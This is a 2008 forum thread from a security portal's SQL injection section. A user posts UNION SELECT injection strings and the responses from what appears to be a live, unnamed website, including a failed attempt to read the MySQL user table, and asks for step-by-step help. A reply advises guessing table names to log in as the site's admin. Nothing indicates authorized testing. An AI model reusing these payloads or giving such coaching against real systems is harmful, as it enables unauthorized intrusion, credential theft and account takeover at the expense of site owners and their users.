|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
sql injection i need little bit help |
|
Posted: Sat Jul 12, 2008 12:48 am |
|
|
feuerzeug |
Beginner |
|
|
Joined: Jul 12, 2008 |
Posts: 1 |
Location: Germany |
|
|
|
|
|
|
hi guys.
sorry for my english
can you help me by this problem, step by step?
Code: | message&showmail='+union+select+1,2,3,4,5,6,7,8,9+-- |
the website Displaying:
8
Betreff: 7
Datum: 01.01.1970 01:00
Code: | message&showmail='+union+select+1,2,3,4,5,6,7,version(),9+-- |
4.1.22-standard
Betreff: 7
Datum: 01.01.1970 01:00
Code: | message&showmail='+union+select+1,2,3,4,5,6,7,COUNT(*),9+FROM+mysql.user+-- |
SELECT command denied to user '******'@'localhost' for table 'user'
can you help me for this little problem?
thanks feuerzeug |
|
Last edited by feuerzeug on Mon Jul 14, 2008 12:39 am; edited 1 time in total |
|
|
|
Posted: Sat Jul 12, 2008 3:25 am |
|
|
apis17 |
Beginner |
|
|
Joined: Jul 10, 2008 |
Posts: 4 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Sat Jul 12, 2008 7:19 am |
|
|
epro |
Regular user |
|
|
Joined: Feb 11, 2008 |
Posts: 24 |
|
|
|
|
|
|
|
Simply, the server administrator is smart an you cannot read mysql.user or information_shema or other tables where are BIG information..
But you can guess table names from that web page, and then login as admin of that page, if you need some help or you didn't understand something, PM me..
P.S. My english isn't very good either.. |
|
|
|
|
www.waraxe.us Forum Index -> Sql injection
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|